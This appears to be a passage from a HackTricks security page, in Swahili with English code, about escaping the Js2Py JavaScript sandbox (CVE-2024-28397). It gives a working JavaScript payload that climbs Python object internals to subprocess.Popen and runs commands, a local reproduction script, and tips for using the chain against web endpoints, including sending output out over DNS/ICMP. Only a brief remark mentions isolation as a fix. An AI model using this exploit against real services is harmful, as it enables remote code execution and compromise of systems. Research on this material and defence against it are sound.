hacked = Object.getOwnPropertyNames({}); // -> dict_keys([]) bymarve = hacked.getattribute; n11 = bymarve(“getattribute”); // attribute access primitive obj = n11(“class”).base; // pivot to <class ‘object’> getattr = obj.getattribute;

function findpopen(o) { let result; for (let i in o.subclasses()) { let item = o.subclasses()[i]; if (item.module == “subprocess” && item.name == “Popen”) { return item; } if (item.name != “type” && (result = findpopen(item))) { return result; } } }

// Popen(cmd, stdin/out/err pipes…) then .communicate() for output n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate(); console.log(n11); n11; // returned to caller if framework sends eval_js result back

</details>

Kwa nini hili linafanya kazi: Js2Py inaonyesha wrappers za Python object kwa JS bila kuondoa `__getattribute__`, `__class__`, `__base__`, au `__subclasses__`. `disable_pyimport()` inazuia tu `pyimport` waziwazi, lakini mnyororo ulio hapo juu hauwahi kuingiza chochote kipya; unatumia tena modules na classes zilizopakiwa tayari katika memory.

## Kurudia mnyororo kwenye kompyuta ya ndani
```bash
# Js2Py 0.74 breaks on Python 3.12/3.13; pin 3.11 for testing
uv run --with js2py==0.74 --python 3.11 python - <<'PY'
import js2py
print(js2py.eval_js("Object.getOwnPropertyNames({})"))                      # dict_keys([])
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__"))    # method-wrapper
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\")"))
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\").__base__"))
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\").__base__.__subclasses__()"))
PY

Kufanya operesheni dhidi ya web sandboxes

• Kila endpoint inayolisha JS inayodhibitiwa na mshambuliaji ndani ya js2py.eval_js (kwa mfano, Flask /run_code API) ni mara moja RCE ikiwa mtumiaji wa process ana ufikiaji wa shell.
• Kurudisha jsonify({'result': result}) kutashindwa wakati .communicate() inarudisha bytes; fanya decode au tuma output moja kwa moja kwa DNS/ICMP ili kuepuka vikwazo vya serialization.
• disable_pyimport() haitoshi kukomesha mnyororo huu; hard isolation (separate process/container) au kuondoa uendeshaaji wa Js2Py kwa code isiyoaminika inahitajika.

Marejeo

• HTB: CodeTwo write-up (Js2Py CVE-2024-28397 escape)
• Marven11 CVE-2024-28397 Js2Py sandbox escape PoC

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.